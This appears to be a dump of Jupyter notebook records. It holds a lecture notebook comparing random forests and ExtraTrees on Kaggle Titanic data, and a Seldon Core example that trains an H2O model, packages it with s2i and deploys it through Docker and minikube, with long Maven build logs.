forests, a step beyond bagged decision trees, are **very widely used** classifiers and regressors. They are relatively simple to use because they require very few parameters to set and they perform pretty well.\n- It is quite common for interviewers to ask how a random forest is constructed or how it is superior to a single decision tree.\n\n--- \n\n## Extremely Randomized Trees (ExtraTrees)\nAdding another step of randomization (and thus de-correlation) yields extremely randomized trees, or _ExtraTrees_. Like Random Forests, these are trained using the random subspace method (sampling of features). However, they are trained on the entire dataset instead of bootstrapped samples. A layer of randomness is introduced in the way the nodes are split. Instead of computing the locally optimal feature/split combination (based on, e.g., information gain or the Gini impurity) for each feature under consideration, a random value is selected for the split. This value is selected from the feature's empirical range.\n\nThis further reduces the variance, but causes an increase in bias. If you're considering using ExtraTrees, you might consider this to be a hyperparameter you can tune. Build an ExtraTrees model and a Random Forest model, then compare their performance!\n\nThat's exactly what we'll do below.",
"_____no_output_____"
],
[
"## Import libraries\n---\n\nWe'll need the following libraries for today's lecture:\n- `pandas`\n- `numpy`\n- `GridSearchCV`, `train_test_split` and `cross_val_score` from `sklearn`'s `model_selection` module \n- `RandomForestClassifier` and `ExtraTreesClassifier` from `sklearn`'s `ensemble` module ",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier\nfrom sklearn.model_selection import cross_val_score, train_test_split, GridSearchCV",
"_____no_output_____"
]
],
[
[
"## Load Data\n---\n\nLoad `train.csv` and `test.csv` from Kaggle into `DataFrames`.",
"_____no_output_____"
]
],
[
[
"train = pd.read_csv('../datasets/train.csv')",
"_____no_output_____"
],
[
"test = pd.read_csv('../datasets/test.csv')",
"_____no_output_____"
],
[
"train.head()",
"_____no_output_____"
],
[
"train.shape",
"_____no_output_____"
]
],
[
[
"## Data Cleaning: Drop the two rows with missing `Embarked` values from train\n---",
"_____no_output_____"
]
],
[
[
"train = train[train['Embarked'].notnull()]",
"_____no_output_____"
],
[
"train.shape",
"_____no_output_____"
],
[
"train[train['Pclass'] == 3]",
"_____no_output_____"
]
],
[
[
"## Data Cleaning: `Fare`\n---\n\nThe test set has one row with a missing value for `Fare`. Fill it with the average `Fare` with everyone from the same `Pclass`. **Use the training set to calculate the average!**",
"_____no_output_____"
]
],
[
[
"mean_fare_3 = train[train['Pclass'] == 3]['Fare'].mean()\nmean_fare_3",
"_____no_output_____"
],
[
"test['Fare'] = test['Fare'].fillna(mean_fare_3)",
"_____no_output_____"
],
[
"test.isnull().sum()",
"_____no_output_____"
]
],
[
[
"## Data Cleaning: `Age`\n---\n\nLet's simply impute all missing ages to be **999**. \n\n**NOTE**: This is not a best practice. However, \n1. Since we haven't really covered imputation in depth\n2. And the proper way would take too long to implement (thus detracting) from today's lecture\n3. And since we're ensembling with Decision Trees\n\nWe'll do it this way as a matter of convenience.",
"_____no_output_____"
]
],
[
[
"train['Age'] = train['Age'].fillna(999)",
"_____no_output_____"
],
[
"test['Age'] = test['Age'].fillna(999)",
"_____no_output_____"
]
],
[
[
"## Feature Engineering: `Cabin`\n---\n\nSince there are so many missing values for `Cabin`, let's binarize that column as follows:\n- 1 if there originally was a value for `Cabin`\n- 0 if it was null\n\n**Do this for both `train` and `test`**",
"_____no_output_____"
]
],
[
[
"train['Cabin'] = train['Cabin'].notnull().astype(int)",
"_____no_output_____"
],
[
"test['Cabin'] = test['Cabin'].notnull().astype(int)",
"_____no_output_____"
]
],
[
[
"## Feature Engineering: Dummies\n---\n\nDummy the `Sex` and `Embarked` columns. Be sure to set `drop_first=True`.",
"_____no_output_____"
]
],
[
[
"train = pd.get_dummies(train, columns=['Sex', 'Embarked'], drop_first=True)",
"_____no_output_____"
],
[
"test = pd.get_dummies(test, columns=['Sex', 'Embarked'], drop_first=True)",
"_____no_output_____"
]
],
[
[
"## Model Prep: Create `X` and `y` variables\n---\n\nOur features will be:\n- `Pclass`\n- `Age`\n- `SibSp`\n- `Parch`\n- `Fare`\n- `Cabin`\n- `Sex_male`\n- `Embarked_Q`\n- `Embarked_S`\n\nAnd our target will be `Survived`",
"_____no_output_____"
]
],
[
[
"features = ['Pclass', 'Age', 'SibSp', 'Parch', 'Fare', 'Cabin', 'Sex_male', 'Embarked_Q', 'Embarked_S']\nX = train[features]\ny = train['Survived']",
"_____no_output_____"
]
],
[
[
"## Challenge: What is our baseline accuracy?\n---\n\nThe baseline accuracy is the percentage of the majority class, regardless of whether it is 1 or 0. It serves as the benchmark for our model to beat.",
"_____no_output_____"
]
],
[
[
"y.value_counts(normalize=True)",
"_____no_output_____"
]
],
[
[
"## Train/Test Split\n---\n\nI know it can be confusing having an `X_test` from our training data vs a test set from Kaggle. If you want, you can use `X_val`/`y_val` for what we normally call `X_test`/`y_test`.",
"_____no_output_____"
]
],
[
[
"X_train, X_val, y_train, y_val = train_test_split(X, y, random_state=42, stratify=y)",
"_____no_output_____"
]
],
[
[
"## Model instantiation\n---\n\nCreate an instance of `RandomForestClassifier` and `ExtraTreesClassifier`.",
"_____no_output_____"
]
],
[
[
"rf = RandomForestClassifier(n_estimators=100)",
"_____no_output_____"
],
[
"et = ExtraTreesClassifier(n_estimators=100)",
"_____no_output_____"
]
],
[
[
"## Model Evaluation\n---\n\nWhich one has a higher `cross_val_score`?",
"_____no_output_____"
]
],
[
[
"cross_val_score(rf, X_train, y_train, cv=5).mean()",
"_____no_output_____"
],
[
"cross_val_score(et, X_train, y_train, cv=5).mean()",
"_____no_output_____"
]
],
[
[
"## Grid Search\n---\n\nThey're both pretty close performance-wise. We could Grid Search over both, but for the sake of time we'll go with `RandomForestClassifier`.",
"_____no_output_____"
]
],
[
[
"rf_params = {\n 'n_estimators': [100, 150, 200],\n 'max_depth': [None, 1, 2, 3, 4, 5],\n}\ngs = GridSearchCV(rf, param_grid=rf_params, cv=5)\ngs.fit(X_train, y_train)\nprint(gs.best_score_)\ngs.best_params_",
"0.8198630905622265\n"
],
[
"gs.score(X_train, y_train)",
"_____no_output_____"
],
[
"gs.score(X_val, y_val)",
"_____no_output_____"
]
],
[
[
"## Kaggle Submission\n---\n\nNow that we've evaluated our model, let's submit our predictions to Kaggle.",
"_____no_output_____"
]
],
[
[
"pred = gs.predict(test[features])",
"_____no_output_____"
],
[
"test['Survived'] = pred",
"_____no_output_____"
],
[
"test[['PassengerId', 'Survived']].to_csv('submission.csv')",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb50a13a281a245cbdcbb8a7e5203d2a0fa162d8 | 12,803 | ipynb | Jupyter Notebook | Tutorials/MarkingTests.ipynb | mbaas2/APLcourse | 3acdbef4a1f7c06be049e8677b71ce8536815a72 | [
"MIT"
] | null | null | null | Tutorials/MarkingTests.ipynb | mbaas2/APLcourse | 3acdbef4a1f7c06be049e8677b71ce8536815a72 | [
"MIT"
] | null | null | null | Tutorials/MarkingTests.ipynb | mbaas2/APLcourse | 3acdbef4a1f7c06be049e8677b71ce8536815a72 | [
"MIT"
] | null | null | null | 25.708835 | 447 | 0.510037 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
cb50a998deef031766a641258109509f026cb13f | 779,348 | ipynb | Jupyter Notebook | examples/models/h2o_mojo/h2o_model.ipynb | lennon310/seldon-core | 7a539b656506943859d0e684a076903a84097dba | [
"Apache-2.0"
] | null | null | null | examples/models/h2o_mojo/h2o_model.ipynb | lennon310/seldon-core | 7a539b656506943859d0e684a076903a84097dba | [
"Apache-2.0"
] | null | null | null | examples/models/h2o_mojo/h2o_model.ipynb | lennon310/seldon-core | 7a539b656506943859d0e684a076903a84097dba | [
"Apache-2.0"
] | null | null | null | 100.821216 | 286 | 0.661341 | [
[
[
"# H2O Model\n\n * Wrap a H2O model for use as a prediction microservice in seldon-core\n * Run locally on Docker to test\n * Deploy on seldon-core running on minikube\n \n## Dependencies\n\n * [Helm](https://github.com/kubernetes/helm)\n * [Minikube](https://github.com/kubernetes/minikube)\n * [S2I](https://github.com/openshift/source-to-image)\n * [H2O](https://www.h2o.ai/download/)\n\n```bash\npip install seldon-core\npip install sklearn\n```\n\n## Train locally\n ",
"_____no_output_____"
]
],
[
[
"!mkdir -p experiment",
"_____no_output_____"
],
[
"import h2o\nh2o.init()\nfrom h2o.estimators.glm import H2OGeneralizedLinearEstimator\npath = \"http://s3.amazonaws.com/h2o-public-test-data/smalldata/prostate/prostate.csv.zip\"\nh2o_df = h2o.import_file(path)\nh2o_df['CAPSULE'] = h2o_df['CAPSULE'].asfactor()\nmodel = H2OGeneralizedLinearEstimator(family = \"binomial\")\nmodel.train(y = \"CAPSULE\",\n x = [\"AGE\", \"RACE\", \"PSA\", \"GLEASON\"],\n training_frame = h2o_df)\nmodelfile = model.download_mojo(path=\"./experiment/\", get_genmodel_jar=False)\nprint(\"Model saved to \" + modelfile)\n",
"[WARNING] H2O requires colorama module of version 0.3.8 or newer. You have version 0.3.7.\nYou can upgrade to the newest version of the module running from the command line\n $ pip3 install --upgrade colorama\nChecking whether there is an H2O instance running at http://localhost:54321..... not found.\nAttempting to start a local H2O server...\n Java Version: openjdk version \"1.8.0_191\"; OpenJDK Runtime Environment (build 1.8.0_191-8u191-b12-2ubuntu0.16.04.1-b12); OpenJDK 64-Bit Server VM (build 25.191-b12, mixed mode)\n Starting server from /home/clive/anaconda3/lib/python3.6/site-packages/h2o/backend/bin/h2o.jar\n Ice root: /tmp/tmpxq550zci\n JVM stdout: /tmp/tmpxq550zci/h2o_clive_started_from_python.out\n JVM stderr: /tmp/tmpxq550zci/h2o_clive_started_from_python.err\n Server is running at http://127.0.0.1:54321\nConnecting to H2O server at http://127.0.0.1:54321... successful.\nWarning: Your H2O cluster version is too old (1 year and 18 days)! Please download and install the latest version from http://h2o.ai/download/\n"
],
[
"!mv experiment/*.zip src/main/resources/model.zip",
"_____no_output_____"
]
],
[
[
"Wrap model using s2i",
"_____no_output_____"
]
],
[
[
"!s2i build . seldonio/seldon-core-s2i-java-build:0.1 h2o-test:0.1 --runtime-image seldonio/seldon-core-s2i-java-runtime:0.1",
"---> Installing application source...\n[INFO] Scanning for projects...\nDownloading: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-parent/1.5.1.RELEASE/spring-boot-starter-parent-1.5.1.RELEASE.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-parent/1.5.1.RELEASE/spring-boot-starter-parent-1.5.1.RELEASE.pom (8 KB at 5.2 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-dependencies/1.5.1.RELEASE/spring-boot-dependencies-1.5.1.RELEASE.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-dependencies/1.5.1.RELEASE/spring-boot-dependencies-1.5.1.RELEASE.pom (88 KB at 363.0 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/kr/motd/maven/os-maven-plugin/1.4.1.Final/os-maven-plugin-1.4.1.Final.pom\nDownloaded: https://repo.maven.apache.org/maven2/kr/motd/maven/os-maven-plugin/1.4.1.Final/os-maven-plugin-1.4.1.Final.pom (7 KB at 112.0 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/9/oss-parent-9.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/9/oss-parent-9.pom (7 KB at 106.9 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.2.1/maven-plugin-api-3.2.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.2.1/maven-plugin-api-3.2.1.pom (4 KB at 62.3 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.2.1/maven-3.2.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.2.1/maven-3.2.1.pom (23 KB at 210.1 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/23/maven-parent-23.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/23/maven-parent-23.pom (32 KB at 256.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/apache/13/apache-13.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/apache/13/apache-13.pom (14 KB at 162.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.2.1/maven-model-3.2.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.2.1/maven-model-3.2.1.pom (5 KB at 82.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.17/plexus-utils-3.0.17.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.17/plexus-utils-3.0.17.pom (4 KB at 62.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.1/plexus-3.3.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.1/plexus-3.3.1.pom (20 KB at 214.7 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/17/spice-parent-17.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/17/spice-parent-17.pom (7 KB at 126.9 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/10/forge-parent-10.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/10/forge-parent-10.pom (14 KB at 167.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.2.1/maven-artifact-3.2.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.2.1/maven-artifact-3.2.1.pom (2 KB at 35.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M5/org.eclipse.sisu.plexus-0.0.0.M5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M5/org.eclipse.sisu.plexus-0.0.0.M5.pom (5 KB at 87.3 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-plexus/0.0.0.M5/sisu-plexus-0.0.0.M5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-plexus/0.0.0.M5/sisu-plexus-0.0.0.M5.pom (13 KB at 165.3 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/7/oss-parent-7.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/7/oss-parent-7.pom (5 KB at 88.9 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.pom (2 KB at 26.4 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-parent/1.0/weld-api-parent-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-parent/1.0/weld-api-parent-1.0.pom (3 KB at 42.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-bom/1.0/weld-api-bom-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-bom/1.0/weld-api-bom-1.0.pom (8 KB at 145.7 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-parent/6/weld-parent-6.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-parent/6/weld-parent-6.pom (21 KB at 255.8 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.pom (1023 B at 18.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.pom\nDownloaded: https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.pom (612 B at 11.7 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/com/google/guava/guava/10.0.1/guava-10.0.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/com/google/guava/guava/10.0.1/guava-10.0.1.pom (6 KB at 99.2 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/10.0.1/guava-parent-10.0.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/10.0.1/guava-parent-10.0.1.pom (2 KB at 36.1 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/1.3.9/jsr305-1.3.9.pom\nDownloaded: https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/1.3.9/jsr305-1.3.9.pom (965 B at 19.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/3.1.0/sisu-guice-3.1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/3.1.0/sisu-guice-3.1.0.pom (10 KB at 183.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-parent/3.1.0/guice-parent-3.1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-parent/3.1.0/guice-parent-3.1.0.pom (11 KB at 205.2 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/aopalliance/aopalliance/1.0/aopalliance-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/aopalliance/aopalliance/1.0/aopalliance-1.0.pom (363 B at 5.9 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M5/org.eclipse.sisu.inject-0.0.0.M5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.0.0.M5/org.eclipse.sisu.inject-0.0.0.M5.pom (3 KB at 44.7 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-inject/0.0.0.M5/sisu-inject-0.0.0.M5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-inject/0.0.0.M5/sisu-inject-0.0.0.M5.pom (14 KB at 184.7 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.pom (815 B at 15.9 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.5/plexus-containers-1.5.5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.5/plexus-containers-1.5.5.pom (5 KB at 67.9 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.7/plexus-2.0.7.pom\n"
],
[
"!docker run --name \"h2o_predictor\" -d --rm -p 5000:5000 h2o-test:0.1",
"43545db7b7f0ee3a6188811d05525d019c5feaaef37779d8e3795205a5664c22\r\n"
]
],
[
[
"Send some random features that conform to the contract",
"_____no_output_____"
]
],
[
[
"!seldon-core-tester contract.json 0.0.0.0 5000 -p",
"----------------------------------------\nSENDING NEW REQUEST:\n\n[[47.799 '2' '2' '1' 2.883]]\nRECEIVED RESPONSE:\ndata {\n ndarray {\n values {\n list_value {\n values {\n number_value: 0.986464936181289\n }\n values {\n number_value: 0.013535063818710993\n }\n }\n }\n }\n}\n\n\n"
],
[
"!docker rm h2o_predictor --force",
"h2o_predictor\r\n"
]
],
[
[
"## Test using Minikube\n\n**Due to a [minikube/s2i issue](https://github.com/SeldonIO/seldon-core/issues/253) you will need [s2i >= 1.1.13](https://github.com/openshift/source-to-image/releases/tag/v1.1.13)**",
"_____no_output_____"
]
],
[
[
"!minikube start --memory 4096 ",
"😄 minikube v0.34.1 on linux (amd64)\n🔥 Creating virtualbox VM (CPUs=2, Memory=4096MB, Disk=20000MB) ...\n📶 \"minikube\" IP address is 192.168.99.100\n🐳 Configuring Docker as the container runtime ...\n✨ Preparing Kubernetes environment ...\n🚜 Pulling images required by Kubernetes v1.13.3 ...\n🚀 Launching Kubernetes v1.13.3 using kubeadm ... \n🔑 Configuring cluster permissions ...\n🤔 Verifying component health .....\n💗 kubectl is now configured to use \"minikube\"\n🏄 Done! Thank you for using minikube!\n"
]
],
[
[
"## Setup Seldon Core\n\nUse the notebook to [Setup Cluster](../../seldon_core_setup.ipynb#Setup-Cluster) with [Ambassador Ingress](../../seldon_core_setup.ipynb#Ambassador) and [Install Seldon Core](../../seldon_core_setup.ipynb#Install-Seldon-Core). Instructions [also online](./seldon_core_setup.html).",
"_____no_output_____"
],
[
"## Build model image and run predictions",
"_____no_output_____"
]
],
[
[
"!eval $(minikube docker-env) && s2i build . seldonio/seldon-core-s2i-java-build:0.1 h2o-test:0.1 --runtime-image seldonio/seldon-core-s2i-java-runtime:0.1",
"---> Installing application source...\n[INFO] Scanning for projects...\nDownloading: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-parent/1.5.1.RELEASE/spring-boot-starter-parent-1.5.1.RELEASE.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-parent/1.5.1.RELEASE/spring-boot-starter-parent-1.5.1.RELEASE.pom (8 KB at 20.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-dependencies/1.5.1.RELEASE/spring-boot-dependencies-1.5.1.RELEASE.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-dependencies/1.5.1.RELEASE/spring-boot-dependencies-1.5.1.RELEASE.pom (88 KB at 936.8 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/kr/motd/maven/os-maven-plugin/1.4.1.Final/os-maven-plugin-1.4.1.Final.pom\nDownloaded: https://repo.maven.apache.org/maven2/kr/motd/maven/os-maven-plugin/1.4.1.Final/os-maven-plugin-1.4.1.Final.pom (7 KB at 147.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/9/oss-parent-9.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/9/oss-parent-9.pom (7 KB at 164.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.2.1/maven-plugin-api-3.2.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven-plugin-api/3.2.1/maven-plugin-api-3.2.1.pom (4 KB at 82.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.2.1/maven-3.2.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven/3.2.1/maven-3.2.1.pom (23 KB at 380.3 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/23/maven-parent-23.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/23/maven-parent-23.pom (32 KB at 548.7 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/apache/13/apache-13.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/apache/13/apache-13.pom (14 KB at 45.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.2.1/maven-model-3.2.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven-model/3.2.1/maven-model-3.2.1.pom (5 KB at 49.3 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.17/plexus-utils-3.0.17.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.17/plexus-utils-3.0.17.pom (4 KB at 72.1 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.1/plexus-3.3.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.1/plexus-3.3.1.pom (20 KB at 322.0 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/17/spice-parent-17.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/17/spice-parent-17.pom (7 KB at 165.0 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/10/forge-parent-10.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/10/forge-parent-10.pom (14 KB at 232.3 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.2.1/maven-artifact-3.2.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/apache/maven/maven-artifact/3.2.1/maven-artifact-3.2.1.pom (2 KB at 41.8 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M5/org.eclipse.sisu.plexus-0.0.0.M5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.0.0.M5/org.eclipse.sisu.plexus-0.0.0.M5.pom (5 KB at 98.3 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-plexus/0.0.0.M5/sisu-plexus-0.0.0.M5.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/eclipse/sisu/sisu-plexus/0.0.0.M5/sisu-plexus-0.0.0.M5.pom (13 KB at 218.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/7/oss-parent-7.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/7/oss-parent-7.pom (5 KB at 112.2 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.pom (2 KB at 36.9 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-parent/1.0/weld-api-parent-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-parent/1.0/weld-api-parent-1.0.pom (3 KB at 59.0 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-bom/1.0/weld-api-bom-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-api-bom/1.0/weld-api-bom-1.0.pom (8 KB at 193.0 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-parent/6/weld-parent-6.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/jboss/weld/weld-parent/6/weld-parent-6.pom (21 KB at 331.3 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.pom (1023 B at 23.8 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.pom\nDownloaded: https://repo.maven.apache.org/maven2/javax/inject/javax.inject/1/javax.inject-1.pom (612 B at 16.6 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/com/google/guava/guava/10.0.1/guava-10.0.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/com/google/guava/guava/10.0.1/guava-10.0.1.pom (6 KB at 125.2 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/10.0.1/guava-parent-10.0.1.pom\nDownloaded: https://repo.maven.apache.org/maven2/com/google/guava/guava-parent/10.0.1/guava-parent-10.0.1.pom (2 KB at 49.1 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/1.3.9/jsr305-1.3.9.pom\nDownloaded: https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/1.3.9/jsr305-1.3.9.pom (965 B at 19.2 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/3.1.0/sisu-guice-3.1.0.pom\nDownloaded: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/3.1.0/sisu-guice-3.1.0.pom (10 KB at 206.5 KB/sec)\nDownloading: https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-parent/3.1.0/guice-parent-3.1.0.pom\nDownloaded: 